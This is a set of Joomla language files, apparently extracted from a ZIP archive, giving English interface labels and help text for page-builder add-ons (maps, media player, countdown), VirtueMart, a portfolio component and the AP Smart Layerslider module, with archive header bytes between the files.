COM_SPPAGEBUILDER_ADDON_GOOGLE_API_KEY="Google Maps API Key"
COM_SPPAGEBUILDER_ADDON_GOOGLE_API_KEY_DESC="From <strong>June 22nd, 2016</strong>, for all new domains, that weren’t already using Google Maps API, usage of Google Maps APIs will from now on require a key. If you don’t have it yet, you will then need to <a href='https://developers.google.com/maps/documentation/javascript/get-api-key#get-an-api-key' target='_blank'>get your API Key here</a>."
COM_SPPAGEBUILDER_ADDON_GOOGLE_API_KEY_PLACEHOLDER="Put here your Google Maps API key"
COM_SPPAGEBUILDER_ADDON_GMAP_COLOR_SETTINGS="Google Map Color Settings"
COM_SPPAGEBUILDER_ADDON_GMAP_LOCATION="Address Location"
COM_SPPAGEBUILDER_ADDON_GMAP_ENABLE_MOUSE_SCROLL="Enables Mouse Scroll Wheel"
COM_SPPAGEBUILDER_ADDON_GMAP_ENABLE_MOUSE_SCROLL_DESC="Enables zoom when scroll mouse wheel over the map. Default value: “No”."
COM_SPPAGEBUILDER_ADDON_GMAP_MAP_TYPE_CONTROL="Enables Map Type Control"
COM_SPPAGEBUILDER_ADDON_GMAP_MAP_TYPE_CONTROL_DESC="The Map Type control is available in a dropdown button style, allowing the user to choose a map type (ROADMAP, SATELLITE, HYBRID, or TERRAIN). This control appears by default in the top right corner of the map. Default value: “No”."
COM_SPPAGEBUILDER_ADDON_GMAP_STREET_VIEW_CONTROL="Enables Street View Control"
COM_SPPAGEBUILDER_ADDON_GMAP_STREET_VIEW_CONTROL_DESC="The Street View control contains a Pegman icon which can be dragged onto the map to enable Street View. This control appears by default in the bottom right corner of the map. Default value: “No”."
COM_SPPAGEBUILDER_ADDON_GMAP_FULLSCREEN_CONTROL="Enables Fullscreen Control"
COM_SPPAGEBUILDER_ADDON_GMAP_FULLSCREEN_CONTROL_DESC="The Fullscreen control offers the option to open the map in fullscreen mode. This control is enabled by default on mobile devices, and is disabled by default on desktop. Note: iOS doesn't support the fullscreen feature. The fullscreen control is therefore not visible on iOS devices. Default value: “No”."

FLEX_GMAP_SHOW_TRANSIT="Show Transit"
FLEX_GMAP_SHOW_TRANSIT_DESC="The Google Maps allows you to display the public transit network of a city on your map."
FLEX_GMAP_SHOW_POI="Show POIs (points of interest)"
FLEX_GMAP_SHOW_POI_DESC="Use of click event listeners on POIs (points of interest), to get more details of the place."


COM_SPPAGEBUILDER_ADDON_GMAP_WATER_COLOR="Water"
COM_SPPAGEBUILDER_ADDON_GMAP_WATER_COLOR_DESC=""
COM_SPPAGEBUILDER_ADDON_GMAP_HW_STROKE_COLOR="Highway Stroke"
COM_SPPAGEBUILDER_ADDON_GMAP_HW_STROKE_COLOR_DESC=""
COM_SPPAGEBUILDER_ADDON_GMAP_HW_FILL_COLOR="Highway Fill"
COM_SPPAGEBUILDER_ADDON_GMAP_HW_FILL_COLOR_DESC=""
COM_SPPAGEBUILDER_ADDON_GMAP_LOCAL_STROKE_COLOR="Local Stroke"
COM_SPPAGEBUILDER_ADDON_GMAP_LOCAL_STROKE_COLOR_DESC=""
COM_SPPAGEBUILDER_ADDON_GMAP_LOCAL_FILL_COLOR="Local Fill"
COM_SPPAGEBUILDER_ADDON_GMAP_LOCAL_FILL_COLOR_DESC=""
COM_SPPAGEBUILDER_ADDON_GMAP_POI_FILL_COLOR="Point Fill"
COM_SPPAGEBUILDER_ADDON_GMAP_POI_FILL_COLOR_DESC=""
COM_SPPAGEBUILDER_ADDON_GMAP_ADMINISTRATIVE_COLOR="Administrative"
COM_SPPAGEBUILDER_ADDON_GMAP_ADMINISTRATIVE_COLOR_DESC=""
COM_SPPAGEBUILDER_ADDON_GMAP_LANDSCAPE_COLOR="Landscape"
COM_SPPAGEBUILDER_ADDON_GMAP_LANDSCAPE_COLOR_DESC=""
COM_SPPAGEBUILDER_ADDON_GMAP_ROAD_TEXT_COLOR="Road Text"
COM_SPPAGEBUILDER_ADDON_GMAP_ROAD_TEXT_COLOR_DESC="Road Text"
COM_SPPAGEBUILDER_ADDON_GMAP_ROAD_ARTERIAL_STROKE_COLOR="Arteroal stroke color"
COM_SPPAGEBUILDER_ADDON_GMAP_ROAD_ARTERIAL_STROKE_COLOR_DESC=""
COM_SPPAGEBUILDER_ADDON_GMAP_ROAD_ARTERIAL_FILL_COLOR="Arteroal fill color"
COM_SPPAGEBUILDER_ADDON_GMAP_ROAD_ARTERIAL_FILL_COLOR_DESC=""


; Plyr HTML5 Video and Audio Player
FLEX_DOWNLOAD="Download"
FLEX_ADDON_PLYR="Plyr Media Player"
FLEX_ADDON_PLYR_DESC="Video, audio (HTML) media player"
FLEX_ADDON_PLYR_SEPARATOR_MEDIA="Select Media for Player"
FLEX_ADDON_PLYR_SEPARATOR_SETTINGS="Settings"
FLEX_ADDON_PLYR_MEDIA="Select Media"
FLEX_ADDON_PLYR_MEDIA_DESC="Here you can select one of the options: HTML5 Video, HTML5 Audio or hosted Youtube or Vimeo Video."
FLEX_VIDEO="Video"
FLEX_AUDIO="Audio"
FLEX_YOUTUBE_VIMEO="Youtube or Vimeo Video"
FLEX_ADDON_PLYR_VIDEO_URL="URL for HTML5 Video (MP4) file"
FLEX_ADDON_PLYR_VIDEO_URL_DESC="Insert absolute or relative URL for HTML5 Video. Absolute URL (path) provides full website address, for example “<strong>http://yoursite.com/videos/video.mp4</strong>” and relative URL (path) to the video that is located on your server, for example: “<strong>images/videos/video.mp4</strong>”"
FLEX_ADDON_PLYR_VIDEO_URL_PLACEHOLDER="images/videos/video.mp4"
FLEX_ADDON_PLYR_AUDIO_URL="URL for HTML5 Audio (MP3) file"
FLEX_ADDON_PLYR_AUDIO_URL_DESC="Insert absolute or relative URL for HTML5 Audio (MP3). Absolute URL (path) provides full website address, for example “<strong>http://yoursite.com/audio/audio.mp3</strong>” and relative URL (path) of audio MP3 that is located on your server, for example: “<strong>images/audio/audio.mp3</strong>”"
FLEX_ADDON_PLYR_AUDIO_URL_PLACEHOLDER="images/audio/audio.mp3"
FLEX_ADDON_PLYR_YOUTUBE_VIMEO_URL_DESC="Insert here YouTube or Vimeo video URL. For YouTube example could be: <strong>https://www.youtube.com/watch?v=bTqVqk7FSmY</strong> or for Vimeo: <strong>https://vimeo.com/143418951</strong>."
FLEX_ADDON_PLYR_YOUTUBE_VIMEO_URL_PLACEHOLDER="YouTube or Vimeo video URL goes here"
FLEX_ADDON_PLYR_VIDEO_POSTER="URL for the poster image (video only)"
FLEX_ADDON_PLYR_VIDEO_POSTER_DESC="Insert absolute or relative URL for poster image. Absolute URL could be, for example “<strong>http://yoursite.com/videos/poster.jpg</strong>” or relative URL (path) for poster that is located on your server, could be for example: “<strong>images/videos/poster.jpg</strong>”"
FLEX_ADDON_PLYR_VIDEO_POSTER_PLACEHOLDER="images/videos/poster.jpg"
FLEX_ADDON_PLYR_CAPTIONS="Closed Captions (Subtitles) for your Video"
FLEX_ADDON_PLYR_CAPTIONS_DESC="Insert absolute or relative URL for closed captions. WebVTT (.vtt) is the format of choice for HTML5 video."
FLEX_ADDON_PLYR_CAPTIONS_PLACEHOLDER="images/videos/captions.vtt"
; Plyr Settings
FLEX_ADDON_PLYR_AUTOPLAY="Autoplay"
FLEX_ADDON_PLYR_AUTOPLAY_DESC="Autoplay the media on load. It is also disabled on iOS (an Apple limitation). The default value is “No”."
FLEX_ADDON_PLYR_TOGGLE_CAPTIONS="Activate (toggle) Captions on Load"
FLEX_ADDON_PLYR_TOGGLE_CAPTIONS_DESC="Toggles if captions should be on by default. The default value is “Yes”."
FLEX_ADDON_PLYR_TOOLTIPS="Enable Tooltips for Controls"
FLEX_ADDON_PLYR_TOOLTIPS_DESC="controls: Display control labels as tooltips on :hover & :focus (by default, the labels are screen reader only). seek: Display a seek tooltip to indicate on click where the media would seek to."

; Plyr Controls (Tooltips)
FLEX_ADDON_PLYR_RESTART="Restart"
FLEX_ADDON_PLYR_PLAY="Play"
FLEX_ADDON_PLYR_PAUSE="Pause"
FLEX_ADDON_PLYR_TOGGLE_MUTE="Toggle Mute"
FLEX_ADDON_PLYR_TOGGLE_CAPTIONS="Toggle Captions"
FLEX_ADDON_PLYR_TOGGLE_FULLSCREEN="Toggle Fullscreen"

; Countdown addon
FLEX_SECOND="Second"
FLEX_SECONDS="Seconds"
FLEX_MINUTE="Minute"
FLEX_MINUTES="Minutes"
FLEX_HOUR="Hour"
FLEX_HOURS="Hours"
FLEX_DAY="Day"
FLEX_DAYS="Days"
FLEX_MONTHS="Months"
FLEX_MONTH="Month"
FLEX_YEAR="Year"
FLEX_YEARS="Years"
FLEX_AGO="ago"
FLEX_COUTNDOWN_FINISHED_TEXT_FONT_SIZE="Finished Text Font size"
FLEX_COUTNDOWN_FINISHED_TEXT_FONT_SIZE_DESC="Custom font size for Finished Text"
FLEX_COUTNDOWN_COUNTER_FONT_STYLE="Counter Font Style"

; PrettyPhoto Modal addon 
FLEX_ADDON_PRETTYPHOTO_MODAL="PrettyPhoto Modal"
FLEX_ADDON_PRETTYPHOTO_MODAL_DESC="Video, Image or Content dialog (modal) prompts"

; Accordion addon 
FLEX_ADDON_COLLAPSE_ALL="Close all panels at start"
FLEX_ADDON_COLLAPSE_ALL_DESC="You can close all panels at start. If not, then first panel will be open (collapsed). Default value: No."

; Animated Headlines addon 
FLEX_ADDON_ANIMATED_HEADLINES="Animated Headlines"
FLEX_ADDON_ANIMATED_HEADLINES_DESC="Interchangeable words with CSS transitions"
FLEX_ADDON_ANIMATED_HEADLINES_BEFORE_TEXT="Before Text"
FLEX_ADDON_ANIMATED_HEADLINES_BEFORE_TEXT_DESC="Insert here “static” text that will apppear <strong>Before</strong> Animated Headline(s)."
FLEX_ADDON_ANIMATED_HEADLINES_AFTER_TEXT="After Text"
FLEX_ADDON_ANIMATED_HEADLINES_AFTER_TEXT_DESC="Insert here “static” text that will apppear <strong>After</strong> Animated Headline(s)."
FLEX_ADDON_ANIMATED_HEADLINE="Animated Headline"
FLEX_ADDON_ANIMATED_HEADLINE_DESC="Insert here text for “Animated Headline” text with CSS transitions."

; Virtuemart Styling
VM_RECENTLY_ADDED_ITEMS="Recently Added Items:"
VM_EMPTY_CART="Cart is Empty"
VM_PRODUCT_SHORT_DESC="Product Info"
VM_PRODUCT_DESC_TITLE="Description"
VM_PRODUCT_REVIEWS="Reviews"
VM_IN_STOCK="In Stock:"
VM_OUT_OF_STOCK="Out of Stock"
VM_VIRTUEMART_REVIEW_COMMENT="Please write a (short) review...<br />(min. %s, max. %s characters) "
VM_VIRTUEMART_CURRENCIES_CHANGE_CURRENCIES="Change"
VM_POPUP_PRODUCT_ADDED_SUCCESS="Product successfully added to"
VM_POPUP_YOUR_SH0PPING_CART="Your Shopping Cart"
VM_POPUP_SH0PPING_CART_QUANTITY="Quantity: "
VM_CART_SHOW_TITLE="Proceed to Checkout"
VM_DISCOUNT_OFF="Off"

; Login
FLEX_LOGIN="Login"
FLEX_LOGIN_HI="Hi"
WELCOME_GUEST="Welcome Guest!"
WELCOME_ACCOUNT="My Account"
MOD_LOGIN_FORGOT="Forgot"
MOD_LOGIN_FORGOT_USERNAME="Username"
MOD_LOGIN_FORGOT_PASSWORD="Password"
MOD_LOGIN_CREATE_ACCOUNT="Create an account"
MOD_LOGIN_OR="or"
MOVIEW_LOGOUT="Logout"
MOD_NEW_REGISTER="New Here? "
FLEX_QUESTION_MARK="?"

FLEX_SHOW_LINK="Show Link"
FLEX_SHOW_AVATAR="Show Avatar"PK!~ҿ%%%en-GB/en-GB.com_spsimpleportfolio.ininu&1i�COM_SPSIMPLEPORTFOLIO_SHOW_ALL="Show All"
COM_SPSIMPLEPORTFOLIO_ZOOM="Zoom"
COM_SPSIMPLEPORTFOLIO_WATCH="Watch"
COM_SPSIMPLEPORTFOLIO_VIEW="View"
COM_SPSIMPLEPORTFOLIO_PROJECT_CLIENT="Client"
COM_SPSIMPLEPORTFOLIO_PROJECT_DATE="Date"
COM_SPSIMPLEPORTFOLIO_PROJECT_CATEGORIES="Categories"
COM_SPSIMPLEPORTFOLIO_PROJECT_TAGS="Tags"
COM_SPSIMPLEPORTFOLIO_VIEW_PROJECT="View Project"
COM_SPSIMPLEPORTFOLIO_CATEGORY="Select Category"
COM_SPSIMPLEPORTFOLIO_CATEGORY_DESC="Select a category from the list."
COM_SPSIMPLEPORTFOLIO_CATEGORY_ALL="All Categories"
COM_SPSIMPLEPORTFOLIO_ERROR_ITEM_NOT_FOUND="Item not found!"
COM_SPSIMPLEPORTFOLIO_ERROR_NOT_AUTHORISED="You are not authorised to view this item."
COM_SPSIMPLEPORTFOLIO_DEFAULT_PAGE_TITLE="Portfolio"
COM_SPPORTFOLIO_BACK_TO_CATEGORY="Back to Category"
PK!7Dur�H�H(en-GB/en-GB.mod_ap_smart_layerslider.ininu&1i�; Copyright (C) 2015 aplikko.com. All rights reserved.
; License GNU General Public License version 2 or later;
; Note : All ini files need to be saved as UTF-8 - No BOM

LIMIT_ITEM_LABEL="Limit Items"
LIMIT_ITEM_DESC="The maximum number of slides you want to display"
LIMIT_ITEMS_APPEND="<i class='icomoon-info'></i>"
LIMIT_ITEM_DATA_CONTENT="The maximum number of slides you want to display in AP Smart Layerslider. <b>Notice:</b> this limit only applies for Joomla or K2 Content, not for items from “Image Folder”."

APSL_SORT_DEFAULT="Default"
APSL_SORT_DATE="Oldest first (by date created)"
APSL_SORT_RDATE="Most recent first (by date created)"
APSL_SORT_PUBLISH_UP="Most recent first (by date published)"
APSL_SORT_ALPHA="Title Alphabetical"
APSL_SORT_RALPHA="Title Reverse-Alphabetical"
APSL_SORT_ORDER="Ordering"
APSL_SORT_RORDER="Ordering reverse"
APSL_SORT_HITS="Most popular"
APSL_SORT_MODIFIED="Latest modified"
APSL_SORT_RAND="Random ordering"

APSL_SORT_ORDER_BY_LABEL="Sort Order By"
APSL_SORT_ORDER_BY_DESC="To sort the data in the module which based on the settings of article, includes date, order, alphabetical, most popular, random, etc."
APSL_TITLE_MAX_LENGTH_LABEL="Title Max Char"
APSL_TITLE_MAX_LENGTH_DESC="Maximum Characters In Articles' title. If the title is longer than this setting, all trimmed characters will be replaced by “<b>...</b>”"
COM_MODULES_SLIDER_SETTINGS_FIELDSET_LABEL="Slider Settings"
COM_MODULES_SOURCE_FIELDSET_LABEL="Source"

AP_THEME_SELECT_LABEL="SELECT THEME"
AP_THEME_SELECT_DESC="Select Theme for AP Smart Layerslider"

AP_EDIT="Edit"
AP_DELETE="Delete"
AP_DELETE_CONFIRMATION="Are you sure you want to delete this image?"

APSL_SHOW_TITLE_LABEL="Show Title"
APSL_SHOW_TITLE_DESC="Set show/hide title of artcle"
APSL_LINKED_TITLE_LABEL="Linked Title"
APSL_LINKED_TITLE_DESC="Show/Hide link of title"
APSL_LINKED_IMAGE_LABEL="Linked Image"
APSL_LINKED_IMAGE_DESC="Show/hide link of image"
APSL_SHOW_IMAGE_LABEL="Show Image"
APSL_SHOW_IMAGE_DESC="Show/Hide image thumb of article"

; Slide Options
APSL_SLIDE_OPTIONS="Slide Options"
APSL_SLIDE_WIDTH_LABEL="Slide Width"
APSL_SLIDE_WIDTH_DESC="Sets the width of the slide. Can be set to a fixed value, for example: 900 (indicating 900 pixels).  Default value: 1170"
APSL_SLIDE_HEIGHT_LABEL="Slide Height"
APSL_SLIDE_HEIGHT_DESC="Sets the height of the slide. Can be set to a fixed value, for example: 400 (indicating 400 pixels). Default value: 300"
APSL_IMAGE_MODE_LABEL="<b>Render Image</b> mode"
APSL_IMAGE_MODE_DESC="If you want to use image mode which render from the image source, then choose CROP or RESIZE. Cached images will be in Joomla's “cache” folder. If set to “No” then images will be from original source."
APSL_USE_RATIO_LABEL="Resize With Use Ratio"
APSL_USE_RATIO_DESC="If you choose YES, then the module will render a thumbnail with the ratio about dimension of the image source"
APSL_AUTO_HEIGHT_LABEL="Auto Height"
APSL_AUTO_HEIGHT_DESC="Add height to owl-wrapper-outer so you can use diffrent heights on slides. Use it only for one item per page setting."
APSL_FORCE_SIZE_LABEL="Force Size"
APSL_FORCE_SIZE_DESC="Indicates if the size of the slider will be forced to full width or full window. The 'Force Size' property is useful when slider might be inside other containers which are less than full width/window. It will still enlarge the slider to fill the width or window by overflowing its parent elements. Default value: 'none'."
APSL_VISIBLE_SIZE_LABEL="Visible Size"
APSL_VISIBLE_SIZE_DESC="Sets the size of the visible area, allowing for more slides to become visible near the selected slide. If you set to '100%' other slides will become visible near the selected slide. If you set to 'auto', only the selected slide will be visible. Default value: 'auto'."
APSL_SLIDE_DISTANCE_LABEL="Slide Distance (margin)"
APSL_SLIDE_DISTANCE_DESC="Sets the distance (margin) between the slides. If set to 0, there will be no space between slides. If 'Force Size' in parameters is set to 'Full Width' and 'Visible Size' is set to '100%', this margin will be visible. Default value: 10."
APSL_RESPONSIVE_LABEL="Responsive"
APSL_RESPONSIVE_DESC="Makes the slider responsive. The slider can be responsive even if the 'width' and/or 'height' properties are set to fixed values. In this situation, 'width' and 'height' will act as the maximum width and height of the slides. Default value: 'Yes'"
APSL_IMAGE_SCALE_MODE_LABEL="Image Scale Mode"
APSL_IMAGE_SCALE_MODE_DESC="Sets the scale mode of the main slide images (images added as background). 'cover' will scale and crop the image so that it fills the entire slide. 'contain' will keep the entire image visible inside the slide. 'exact' will match the size of the image to the size of the slide. 'none' will leave the image to its original size. Default value: 'Cover'"
APSL_AUTO_HEIGHT_LABEL="Auto Height"
APSL_AUTO_HEIGHT_DESC="Indicates if height of the slider will be adjusted to the height of the selected slide. Default value: 'No'."
APSL_AUTO_SCALE_LABEL="Auto Scale Layers"
APSL_AUTO_SCALE_DESC="Indicates whether the layers will be scaled automatically. Default value: 'Yes'."
APSL_WAIT_FOR_LAYERS_LABEL="Wait For Layers"
APSL_WAIT_FOR_LAYERS_DESC="Indicates whether the slider will wait for the layers to disappear before going to a new slide. Default value: 'No'."
APSL_ORIENTATION_LABEL="Orientation"
APSL_ORIENTATION_DESC="Indicates whether the slides will be arranged horizontally or vertically. Default value: 'Horizontal'."
APSL_LOOP_LABEL="Loop"
APSL_LOOP_DESC="Indicates if the slider will be loopable (infinite scrolling). Default value: 'Yes'."
APSL_SHUFFLE_LABEL="Shuffle Slides"
APSL_SHUFFLE_DESC="Indicates if the slides will be shuffled, in a randomized order. Default value: 'No'."
APSL_FULLSCREEN_LABEL="Show Full-screen button"
APSL_FULLSCREEN_DESC="Indicates whether the full-screen button is enabled. Default value: 'No'."
APSL_FADE_LABEL="Fade Slides"
APSL_FADE_DESC="Indicates if fade will be used. Module replaces the default slide/swipe transition with a fade transition. Default value: 'No'."
APSL_FADE_PREVIOUS_SLIDE_LABEL="Fade Out Previous Slide"
APSL_FADE_PREVIOUS_SLIDE_DESC="Indicates if the previous slide will be faded out (in addition to the next slide being faded in). Default value: 'Yes'."
FADE_DURATION_DATA="Sets the duration of the fade effect. 1 second = 1000 milliseconds. Default is 500 (0.5 seconds)."
FADE_DURATION_LABEL="Fade duration"
FADE_DURATION_DESC="Sets the duration of the fade effect. Default value: 500."
APSL_AUTOPLAY_LABEL="Autoplay"
APSL_AUTOPLAY_DESC="Indicates whether or not autoplay will be enabled. Default value: 'No'."
APSL_AUTOPLAY_DELAY_DATA="Sets the duration for delay/interval. 1 second = 1000 milliseconds. Default is 5000 (5 seconds)."
APSL_AUTOPLAY_DELAY_DESC="Sets the delay/interval (in milliseconds) at which the autoplay will run."
APSL_AUTOPLAY_ON_HOVER_LABEL="Autoplay On Hover"
APSL_AUTOPLAY_ON_HOVER_DESC="Indicates if the autoplay will be paused or stopped when the slider is hovered. Default value: 'Pause'."


; Thumbnail Settings
APSL_THUMBNAIL_SETTINGS="Thumbnail Settings"
APSL_THUMBNAILS_LABEL="Show Thumbnails"
APSL_THUMBNAILS_DESC="Show or Hide Thumbnails. Default value: 'No'."
APSL_THUMBNAIL_WIDTH_LABEL="Thumbnail Width"
APSL_THUMBNAIL_WIDTH_DESC="Sets the width of the thumbnail within the slider. Default value: 100."
APSL_THUMBNAIL_HEIGHT_LABEL="Thumbnail Height"
APSL_THUMBNAIL_HEIGHT_DESC="Sets the width of the thumbnail within the slider. Default value: 80."
APSL_THUMBNAIL_TXT_ALIGN_LABEL="Text align (orientation)"
APSL_THUMBNAIL_TXT_ALIGN_DESC="Text align for Thumbnail text. Default value: 'Left'."
APSL_SHOW_THUMBNAIL_DESCRIPTION_LABEL="Show thumbnail description"
APSL_SHOW_THUMBNAIL_DESCRIPTION_DESC="Additional text (description) in thumbnails. Default value: 'Yes'."
APSL_THUMBNAIL_DESCRIPTION_MAXCHARS_LABEL="Thumbnail description max characters"
APSL_THUMBNAIL_DESCRIPTION_MAXCHARS_DESC="Maximum characters for the thumbnail description. Default value: 50. Set 0 to hide. Set -1 to unlimited."
APSL_SELECTED_THUMBNAIL_TXTCOLOR_LABEL="Selected thumbnail text color"
APSL_SELECTED_THUMBNAIL_TXTCOLOR_DESC="Custom 'selected' thumbnail text color."
APSL_SELECTED_THUMBNAIL_BCKG_LABEL="Selected thumbnail background"
APSL_SELECTED_THUMBNAIL_BCKG_DESC="Custom 'selected' thumbnail background color with alpha transparency (RGBA format)."
APSL_THUMBNAIL_POSITION_LABEL="Thumbnails Position"
APSL_THUMBNAIL_POSITION_DESC="Sets the position of the thumbnail scroller. Default value: 'Bottom'."
APSL_THUMBNAIL_POINTER_LABEL="Thumbnail Pointer"
APSL_THUMBNAIL_POINTER_DESC="Indicates if a pointer will be displayed for the selected thumbnail. Default value: 'No'."
APSL_THUMBNAIL_POINTER_COLOR_LABEL="Thumbnail pointer color"
APSL_THUMBNAIL_POINTER_COLOR_DESC="Custom thumbnail pointer color."
APSL_THUMBNAIL_ARROWS_LABEL="Thumbnail Arrows"
APSL_THUMBNAIL_ARROWS_DESC="Indicates whether the thumbnail arrows will be enabled. Default value: 'No'."


; Arrows
APSL_ARROWS="Arrows"
APSL_SHOW_ARROWS_LABEL="Show arrows"
APSL_SHOW_ARROWS_DESC="Adds navigation arrows for the slides. Default value: 'Yes'."
APSL_ARROWS_SIZE_LABEL="Arrows size"
APSL_ARROWS_SIZE_DESC="Sets the size (font-size) for arrows. Since AP Smart LayerSlider doesn't use images for arrows, but webfont instead (icons - scalable vector graphics fonts), font-size is required. Default value: 50(px)."
APSL_ARROWS_BACKG_COLOR_LABEL="Arrows background color"
APSL_ARROWS_BACKG_COLOR_DESC="Custom background color for navigation arrows, with alpha transparency (RGBA format)."
APSL_ARROWS_COLOR_LABEL="Arrows color"
APSL_ARROWS_COLOR_DESC="Custom color for arrows. If nothing is set, default color is: 'white'."

; Buttons
APSL_BUTTONS="Buttons"
APSL_SHOW_BUTTONS_LABEL="Show buttons"
APSL_SHOW_BUTTONS_DESC="Indicates whether the buttons will be created. Default value: 'Yes'."
APSL_BUTTONS_COLOR_LABEL="Buttons color"
APSL_BUTTONS_COLOR_DESC="Custom color for buttons with alpha transparency (RGBA format). If you leave it transparent, it will inherit default value - black color."

; Captions
APSL_CAPTIONS="Captions"
APSL_DISPLAY_CAPTIONS_LABEL="Display <b>captions</b>"
APSL_DISPLAY_CAPTIONS_DESC="Allows you to add captions to slides. Captions will be displayed one at a time, below the slides. Show or Hide caption for each slide. Default value: 'No'."
APSL_CAPTION_TXT_ALIGN_LABEL="Text align (orientation)"
APSL_CAPTION_TXT_ALIGN_DESC="Text align for Captions. Default value: 'Center'."
APSL_CAPTION_MAX_CHARS_LABEL="Captions max characters"
APSL_CAPTION_MAX_CHARS_DESC="Maximum characters for the captions. Default is 70. Set 0 to hide. Set -1 to unlimited."

; Video Options
APSL_VIDEO_LABEL="Video Options"
APSL_VIDEO_DESC="<p><span style='font-size:18px;margin:1px 5px 0 0;color:#659bba;' class='fa fa-info-circle'></span>Provides automatic control of the videos loaded inside the slider. For example, the video will pause automatically when another slide is selected, or, if the autoplay is running, it will be paused when a video starts playing.</p>
<p>The video types or providers supported by this module are: <strong>YouTube, Vimeo, HTML5 and Video.js</strong>.</p>
<p>Please note that, in order to use Video.js, you need to load the Video.js JavaScript and CSS files in your page (button “Load Video.js”). More information about how to use Video.js, in general, can be found on the official <a href="http://www.videojs.com/" target="_blank">Video.js</a> page.</p>"
APSL_LOAD_VIDEOJS_LABEL="Load Video.js"
APSL_LOAD_VIDEOJS_DESC="Loads javascript and css files for Video.js - HTML5 Video Player, open source HTML5 video player that supports HTML5 and Flash video, video playback on desktops and mobile devices. Default value: 'No'."
APSL_REACH_VIDEO_ACTION_LABEL="Reach Video Action"
APSL_REACH_VIDEO_ACTION_DESC="Sets the action that the video will perform when its slide container is selected. Default value: 'None'."
APSL_LEAVE_VIDEO_ACTION_LABEL="Leave Video Action"
APSL_LEAVE_VIDEO_ACTION_DESC="Sets the action that the video will perform when another slide is selected. Default value: 'Pause Video'."
APSL_PLAY_VIDEO_ACTION_LABEL="Play Video Action"
APSL_PLAY_VIDEO_ACTION_DESC="Sets the action that the slider will perform when the video starts playing. Default value: 'Stop Autoplay'."
APSL_PAUSE_VIDEO_ACTION_LABEL="Pause Video Action"
APSL_PAUSE_VIDEO_ACTION_DESC="Sets the action that the slider will perform when the video starts playing. Default value: 'None'."
APSL_END_VIDEO_ACTION_LABEL="End Video Action"
APSL_END_VIDEO_ACTION_DESC="Sets the action that the slider will perform when the video starts playing. Default value: 'None'."

; Way to load main javascript (Advanced options)
APSL_LOAD_JS_LABEL="Load Main Script"
APSL_LOAD_JS_DESC="There are two ways to load main script for slider: using “Custom tag” or “To Head”. Because the script is jQuery dependent, and it needs to be loaded <strong>after</strong> jQuery, “Custom tag” option will ensure that it comes after jQuery. “To Head” option is Joomla standard, but if you load module inside article using “Load Modules” Joomla plugin, then in some templates, “To Head” would load main script before jQuery and cause conflict. In that case, choose “Custom tag”."
APSL_JS_LABEL_INFO_LABEL="Way to load main script"
APSL_JS_LABEL_INFO_DESC="<p><span style='font-size:18px;margin:1px 5px 0 0;color:#659bba;' class='fa fa-info-circle'></span>There are two ways to load main script for slider: using “Custom tag” or “To Head”. Because the script is jQuery dependent, and it needs to be loaded <strong>after</strong> jQuery, “Custom tag” option will ensure that it comes after jQuery. “To Head” option is Joomla standard, but if you load module inside article using “Load Modules” Joomla plugin, then in some templates, “To Head” would load main script before jQuery and cause conflict. In that case, choose “Custom tag”. For more about adding JavaScript to the page, see <a href="https://docs.joomla.org/J3.x:Adding_JavaScript_and_CSS_to_the_page" target="_blank">reference on Joomla's site</a> page.</p><p><em>Default option is “Add Custom Tag”</em></p>"

APSL_SHOW_CAPTION_HOVER_LABEL="Show Captions"
APSL_SHOW_CAPTION_HOVER_DESC="Show Captions arrows - always or on hover state, if the Captions are enabled above. Default is “Hover”."
APSL_DESCRIPTION_TITLE="Show Description & Title"
APSL_DESCRIPTION_TITLE_DESC="Show/hide Description and Title on the module area."
APSL_SHOW_READMORE_LABEL="Show Readmore"
APSL_SHOW_READMORE_DESC="Show/Hide readmore link"

UPLOAD_IMAGES_LABEL="Images Uploader:"

MOD_AP_RESIZE="Resize"
MOD_AP_CROP="Crop"
APSL_READMORE="Readmore"
APSL_SHOW_DESCRIPTION_LABEL="Show Description"
APSL_SHOW_DESCRIPTION_DESC="Set show/hide description of article"
APSL_READMORE_TEXT_LABEL="Readmore Text"
APSL_READMORE_TEXT_DESC="Text of Readmore"

APSL_DISPLAY_FORM_LABEL="Content Source"
APSL_DISPLAY_FORM_DESC="Select the content source for slider module, if you choose “Image Folder”, please set the image folder path."
JOOMLA_CONTENT="Joomla Content"
K2_CONTENT="K2 Content"
APSL_CATEGORY_LABEL="<span style='font-size:15px;color:#999;margin:1px 5px 0 0;vertical-align:top;line-height:18px;' class='fa fa-joomla'></span><strong>Joomla's Category</strong>"
APSL_CATEGORY_DESC="Select content category"
APSL_K2_CATEGORY_LABEL="<span style='display:inline-table;margin:-1px 5px 0 0;vertical-align:top;'><img src='../modules/mod_ap_smart_layerslider/admin/images/k2-logo.png' /></span></i><strong>K2 Category</strong>"
APSL_K2_CATEGORY_DESC="Select k2 category"
APSL_K2_CATEGORY_ERROR="WARNING! <strong>K2</strong> component not installed on your site"
APSL_IMAGE_FOLDER="Image Folder"
APSL_PATH_TO_FOLDER_LABEL="<span style='font-size:15px;color:#999;margin:0 5px 0 0;vertical-align:top;line-height:18px;' class='fa fa-folder-open'></span><b>Image Folder Path</b>"
APSL_PATH_TO_FOLDER_DESC="Relative to Joomla images folder, for example: images/folderwithimages"
APSL_PATH_TO_FOLDER_APPEND="<i class='icomoon-info'></i>"
APSL_PATH_TO_FOLDER_DATA_CONTENT="Folder path is relative to Joomla's images folder, for example: images/your-folder-with-images"

APSL_STRIP_TAGS="Strip HTML Tags"
APSL_STRIP_TAGS_DESC="Remove the HTML Tags by enabling this feature."
APSL_EFFECT="Effect"
APSL_EFFECT_DESC="Choose an effect for carousel"
AUTO_START="AutoPlay"
AUTO_START_DESC="Whether to allow the module to play automatically"
INTERVAL="<b>Interval</b> (in milliseconds)"
INTERVAL_DESC="Set period of time to allow the module playing (cycle time). 1 second = 1000 milliseconds. Default is 5000 (5 seconds)."
INTERVAL_APPEND="<i class='icomoon-info'></i>"

APSL_DISPLAY_ARROWS="Display <b>arrows</b><br />(previous / next)"
APSL_DISPLAY_ARROWS_DESC="Show/hide navigation arrows"
APSL_SHOW_ARROWS_HOVER_LABEL="Show Arrows<br />(always or on Hover state)"
APSL_SHOW_ARROWS_HOVER_DESC="Show “Previous” and “Next” arrows - always or on hover, if the Arrows are enabled above. Default is “Hover”."


EDIT_SLIDE="EDIT SLIDE"
AP_TITLE="Title"
AP_TITLE_POPUP="<span style='font-size:90%;'>Title for this slide</span>"
AP_CAPTION="Caption"
AP_CAPTION_POPUP="<span style='font-size:90%;'>Caption for this slide</span>"
AP_DESCRIPTION="Description"
